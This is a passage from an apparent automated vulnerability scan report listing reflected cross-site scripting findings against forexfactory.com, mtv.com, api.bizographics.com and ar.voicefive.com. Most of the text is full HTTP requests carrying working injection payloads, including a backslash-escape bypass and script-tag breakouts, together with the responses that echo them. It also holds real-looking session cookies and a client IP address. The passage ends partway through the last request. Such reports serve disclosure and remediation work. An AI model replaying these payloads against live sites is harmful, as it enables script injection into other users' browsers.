The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /ws_cal.php?do=fetch&width=845&height=500&font=14&dark=0&colors[3]=%23869BBF%20url%28images/gradients/gradient_tcat.gif%29%20repeat-x&colors[5]=%235C7099%20url%28images/gradients/gradient_thead.gif%29%20repeat-x&colors[7]=%23F5F5FF&colors[4]=%23FFFFFF&colors[6]=%23FFFFFF&colors[8]=%23000000&colors[1]=%230B198C&colors[2]=%23d1d1e126b9b\"%3balert(1)//33ca1322ece&width_type=px&height_type=px&timezone=-5&timeformat=0&timedst=1&nocache=8229.065318565583 HTTP/1.1
Host: www.forexfactory.com
Proxy-Connection: keep-alive
Referer: http://www.livewithoscar.com/Calendar.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 12:07:57 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: fflastactivity=0; expires=Wed, 13-Jun-2012 12:07:57 GMT; path=/; domain=.forexfactory.com
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: application/x-javascript; charset=windows-1252
Content-Length: 67984

var _sds_html = '';
_sds_html += "<form method=\"post\"action=\"index.php\" onsubmit=\"return ffSyndication_Calendar.calendar_filters(this, false);\" name=\"_cal_filters\">";
_sds_html += "<input ty
...[SNIP]...
<td class=\"dateHeading\" colspan=\"9\" style=\"border-bottom: 1px solid #d1d1e126b9b\\";alert(1)//33ca1322ece;\" width=\"100%\">
...[SNIP]...
3.41. http://www.forexfactory.com/ws_cal.php [colors[4] parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.forexfactory.com
Path:   /ws_cal.php

Issue detail

The value of the colors[4] request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cff61\"%3balert(1)//59731740299 was submitted in the colors[4] parameter. This input was echoed as cff61\\";alert(1)//59731740299 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /ws_cal.php?do=fetch&width=845&height=500&font=14&dark=0&colors[3]=%23869BBF%20url%28images/gradients/gradient_tcat.gif%29%20repeat-x&colors[5]=%235C7099%20url%28images/gradients/gradient_thead.gif%29%20repeat-x&colors[7]=%23F5F5FF&colors[4]=%23FFFFFFcff61\"%3balert(1)//59731740299&colors[6]=%23FFFFFF&colors[8]=%23000000&colors[1]=%230B198C&colors[2]=%23d1d1e1&width_type=px&height_type=px&timezone=-5&timeformat=0&timedst=1&nocache=8229.065318565583 HTTP/1.1
Host: www.forexfactory.com
Proxy-Connection: keep-alive
Referer: http://www.livewithoscar.com/Calendar.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 12:06:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: fflastactivity=0; expires=Wed, 13-Jun-2012 12:06:19 GMT; path=/; domain=.forexfactory.com
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: application/x-javascript; charset=windows-1252
Content-Length: 67744

var _sds_html = '';
_sds_html += "<form method=\"post\"action=\"index.php\" onsubmit=\"return ffSyndication_Calendar.calendar_filters(this, false);\" name=\"_cal_filters\">";
_sds_html += "<input ty
...[SNIP]...
<a href=\"#\" style=\"white-space: nowrap; color: #FFFFFFcff61\\";alert(1)//59731740299;\">
...[SNIP]...
3.42. http://www.forexfactory.com/ws_cal.php [colors[8] parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.forexfactory.com
Path:   /ws_cal.php

Issue detail

The value of the colors[8] request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cfe41\"%3balert(1)//5fae3ef9ef8 was submitted in the colors[8] parameter. This input was echoed as cfe41\\";alert(1)//5fae3ef9ef8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /ws_cal.php?do=fetch&width=845&height=500&font=14&dark=0&colors[3]=%23869BBF%20url%28images/gradients/gradient_tcat.gif%29%20repeat-x&colors[5]=%235C7099%20url%28images/gradients/gradient_thead.gif%29%20repeat-x&colors[7]=%23F5F5FF&colors[4]=%23FFFFFF&colors[6]=%23FFFFFF&colors[8]=%23000000cfe41\"%3balert(1)//5fae3ef9ef8&colors[1]=%230B198C&colors[2]=%23d1d1e1&width_type=px&height_type=px&timezone=-5&timeformat=0&timedst=1&nocache=8229.065318565583 HTTP/1.1
Host: www.forexfactory.com
Proxy-Connection: keep-alive
Referer: http://www.livewithoscar.com/Calendar.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 12:07:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: fflastactivity=0; expires=Wed, 13-Jun-2012 12:07:07 GMT; path=/; domain=.forexfactory.com
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: application/x-javascript; charset=windows-1252
Content-Length: 67864

var _sds_html = '';
_sds_html += "<form method=\"post\"action=\"index.php\" onsubmit=\"return ffSyndication_Calendar.calendar_filters(this, false);\" name=\"_cal_filters\">";
_sds_html += "<input ty
...[SNIP]...
<tr class=\"eventRow\" id='timeoptions' style=\"display: none; color: #000000cfe41\\";alert(1)//5fae3ef9ef8;\">
...[SNIP]...
3.43. http://www.mtv.com/games/arcade/game/play.jhtml [arcadeGameId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.com
Path:   /games/arcade/game/play.jhtml

Issue detail

The value of the arcadeGameId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9d53"><script>alert(1)</script>9c033e45818 was submitted in the arcadeGameId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /games/arcade/game/play.jhtml?arcadeGameId=10325912c9d53"><script>alert(1)</script>9c033e45818 HTTP/1.1
Host: www.mtv.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1864906649-1307963885068; mtvn_guid=1307963888-186; s_nr=1307963913916; ak-mobile-detected=no; projxcookie=yes; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D5840%253Bdemo%253D2966%253Bdemo%253D2907%253Bdemo%253D2905%253Bdemo%253D2904%253Bdemo%253D1607%253Bdemo%253D1299%253Bdemo%253D850%253Bdemo%253D848%253Bdemo%253D844%253Bdemo%253D827%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775%253Bdemo%253D774; s_ppv=62; mbox=session#1308010496673-477284#1308012600|check#true#1308010800; __cs_rr=1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Content-Type: text/html
ETag: 71a676dc24ad738496eca8b5e2b43ab6
Vary: Accept-Encoding
Cache-Control: max-age=573
Date: Tue, 14 Jun 2011 00:19:25 GMT
Content-Length: 15890
Connection: close

<error>No Data</error>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" x
...[SNIP]...
<script type="text/javascript" src="/sitewide/scripts/reportIMX.jhtml?arcadeGameId=10325912c9d53"><script>alert(1)</script>9c033e45818">
...[SNIP]...
3.44. http://www.mtv.com/global/music/scripts/reportFluxView.jhtml [uri parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.com
Path:   /global/music/scripts/reportFluxView.jhtml

Issue detail

The value of the uri request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 76933'%3balert(1)//6a994bac4ef was submitted in the uri parameter. This input was echoed as 76933';alert(1)//6a994bac4ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /global/music/scripts/reportFluxView.jhtml?uri=mgid:cms:item:mtv.com:1032591276933'%3balert(1)//6a994bac4ef HTTP/1.1
Host: www.mtv.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/game/play.jhtml?arcadeGameId=10325912
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1864906649-1307963885068; mtvn_guid=1307963888-186; s_nr=1307963913916; ak-mobile-detected=no; projxcookie=yes; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D5840%253Bdemo%253D2966%253Bdemo%253D2907%253Bdemo%253D2905%253Bdemo%253D2904%253Bdemo%253D1607%253Bdemo%253D1299%253Bdemo%253D850%253Bdemo%253D848%253Bdemo%253D844%253Bdemo%253D827%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775%253Bdemo%253D774; s_ppv=62; __cs_rr=1; s_cc=true; s_sq=%5B%5BB%5D%5D; mbox=session#1308010496673-477284#1308012624|check#true#1308010824

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
ETag: 8b8896d1e8baa4e52a4cb67abcf72b
Last-Modified: Tue, 14 Jun 2011 00:19:32 GMT
Content-Type: application/x-javascript
Content-Length: 597
Cache-Control: max-age=86386
Date: Tue, 14 Jun 2011 00:19:32 GMT
Connection: close
Vary: Accept-Encoding

var reportUri = "mgid:cms:item:mtv.com:1032591276933';alert(1)//6a994bac4ef";

if (reportUri.indexOf("photolist") != -1) {
reportUri = reportUri.substring(reportUri.lastIndexOf(":") + 1);

if (document.referrer.indexOf(reportUri) == -1)
MTVN.Reporting.reportFluxView('http://t.flux.com/tracking.gif?CMU=D3FCFFFF0002D51D0002FFFFFCD3&CUR=mgid:cms:item:mtv.com:1032591276933';alert(1)//6a994bac4ef&WN=ContentView');
}
else
MTVN.Reporting.reportFluxView('http://t.flux.com/tracking.gif?CMU=D3FCFFFF0002D51D0002FFFFFCD3&CUR=mgid:cms:item:mtv.com:1032591276933';alert(1)//6a994bac4ef&WN=ContentView');
...[SNIP]...
3.45. http://www.mtv.com/global/music/scripts/reportFluxView.jhtml [uri parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.com
Path:   /global/music/scripts/reportFluxView.jhtml

Issue detail

The value of the uri request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d3919"%3balert(1)//d2192e09569 was submitted in the uri parameter. This input was echoed as d3919";alert(1)//d2192e09569 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /global/music/scripts/reportFluxView.jhtml?uri=mgid:cms:item:mtv.com:10325912d3919"%3balert(1)//d2192e09569 HTTP/1.1
Host: www.mtv.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/game/play.jhtml?arcadeGameId=10325912
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1864906649-1307963885068; mtvn_guid=1307963888-186; s_nr=1307963913916; ak-mobile-detected=no; projxcookie=yes; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D5840%253Bdemo%253D2966%253Bdemo%253D2907%253Bdemo%253D2905%253Bdemo%253D2904%253Bdemo%253D1607%253Bdemo%253D1299%253Bdemo%253D850%253Bdemo%253D848%253Bdemo%253D844%253Bdemo%253D827%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775%253Bdemo%253D774; s_ppv=62; __cs_rr=1; s_cc=true; s_sq=%5B%5BB%5D%5D; mbox=session#1308010496673-477284#1308012624|check#true#1308010824

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
ETag: 5014b291ce7f542c23c5819d4bdabeb
Last-Modified: Tue, 14 Jun 2011 00:19:32 GMT
Content-Type: application/x-javascript
Content-Length: 597
Cache-Control: max-age=86296
Date: Tue, 14 Jun 2011 00:19:32 GMT
Connection: close
Vary: Accept-Encoding

var reportUri = "mgid:cms:item:mtv.com:10325912d3919";alert(1)//d2192e09569";

if (reportUri.indexOf("photolist") != -1) {
reportUri = reportUri.substring(reportUri.lastIndexOf(":") + 1);

if (document.referrer.indexOf(reportUri) == -1)
MTVN.Reporting.reportFluxView('http://t
...[SNIP]...
3.46. http://www.mtv.com/sitewide/scripts/reportIMX.jhtml [arcadeGameId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.com
Path:   /sitewide/scripts/reportIMX.jhtml

Issue detail

The value of the arcadeGameId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cf21f'%3balert(1)//25ce7a73533 was submitted in the arcadeGameId parameter. This input was echoed as cf21f';alert(1)//25ce7a73533 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sitewide/scripts/reportIMX.jhtml?arcadeGameId=10325912cf21f'%3balert(1)//25ce7a73533 HTTP/1.1
Host: www.mtv.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/game/play.jhtml?arcadeGameId=10325912
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1864906649-1307963885068; mtvn_guid=1307963888-186; s_nr=1307963913916; ak-mobile-detected=no; projxcookie=yes; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D5840%253Bdemo%253D2966%253Bdemo%253D2907%253Bdemo%253D2905%253Bdemo%253D2904%253Bdemo%253D1607%253Bdemo%253D1299%253Bdemo%253D850%253Bdemo%253D848%253Bdemo%253D844%253Bdemo%253D827%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775%253Bdemo%253D774; s_ppv=62; __cs_rr=1; s_cc=true; s_sq=%5B%5BB%5D%5D; mbox=session#1308010496673-477284#1308012624|check#true#1308010824

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
ETag: d1ae8408bccac9b42438b17c11806e
Last-Modified: Tue, 14 Jun 2011 00:19:33 GMT
Content-Type: application/x-javascript
Content-Length: 333
Cache-Control: max-age=86389
Date: Tue, 14 Jun 2011 00:19:33 GMT
Connection: close
Vary: Accept-Encoding

if(typeof MTV.Reporting.reportIMX == "function"){
var reportIMX = MTV.Reporting.reportIMX;

reportIMX('http://imx.mtv.com/sitewide/droplets/view_gen.jhtml?itemUrl=cms_item%3A%2F%2Fwww.mtv.com%2F10325912cf21f%27%3Balert%281%29%2F%2F25ce7a73533&tagParams=tag_action%3Dviewed%26', 'cms_item', '10325912cf21f';alert(1)//25ce7a73533');

}
3.47. http://api.bizographics.com/v1/profile.json [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload fa9fc<script>alert(1)</script>664cb18f463 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoData&api_key=r9t72482usanbp6sphprhvun HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: fa9fc<script>alert(1)</script>664cb18f463
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoNetworkPartnerIndex=3; BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe1h0yfLwyxARVExkNK7HUtFp4B4dlWpgdhb8ERjlseVzj8l3ZY0x538DagN4siiD1aaCmzSiiJQK8lykQMu396nckTo4nxwoHo0CoRZSiif2tsuiicEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjv3LIcisLQsnJDisGQdUK2D6ztJRFsRyXovJAo8OukxqBLBWr1XIQIIGVWAglyTqlNGtBiitkUr3XlAiscQyzlKxEyj6p6QYsvgf51m9Da6XiirwxBVxp0nP77W3oMweEdXU6bnuSFykW54FN6yii1oRyCQGqk84Nzl6iivmHYAZUugJ8wSyDpwAsYYmSo3LDnHii2Cip8QnOcWG7PlEjokDX1b7LIGtQieie

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Tue, 14 Jun 2011 00:17:01 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 58
Connection: keep-alive

Unknown Referer: fa9fc<script>alert(1)</script>664cb18f463
3.48. http://ar.voicefive.com/b/node_rcAll.pli [BMX_3PC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/node_rcAll.pli

Issue detail

The value of the BMX_3PC cookie is copied into the HTML document as plain text between tags. The payload 33f3f<script>alert(1)</script>1e9269f0574 was submitted in the BMX_3PC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /b/node_rcAll.pli?func=COMSCORE.BMX.Buddy.run&1308010663788 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172; BMX_3PC=133f3f<script>alert(1)</script>1e9269f0574

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:46 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_G=0; expires=Thu 18-Sep-2008 00:17:46 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1557

COMSCORE.BMX.Buddy.run({ "ar_p97464717": 'exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&', "ar_p101866669": 'exp=1&initExp=Sat May 21 12:32:54 2011&
...[SNIP]...
"ar_p56282763": 'exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&', "UID": '4a757a7-24.143.206.42-1305663172', "BMX_3PC": '133f3f<script>alert(1)</script>1e9269f0574', "ar_p101945457": 'exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&', "BMX_BR": 'pid=p104567837&prad=63567820&arc=42361216&exp=1308010528', "ar_p9
...[SNIP]...
3.49. http://ar.voicefive.com/b/node_rcAll.pli [BMX_BR cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/node_rcAll.pli

Issue detail

The value of the BMX_BR cookie is copied into the HTML document as plain text between tags. The payload 9d9d7<script>alert(1)</script>a917426b808 was submitted in the BMX_BR cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /b/node_rcAll.pli?func=COMSCORE.BMX.Buddy.run&1308010663788 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
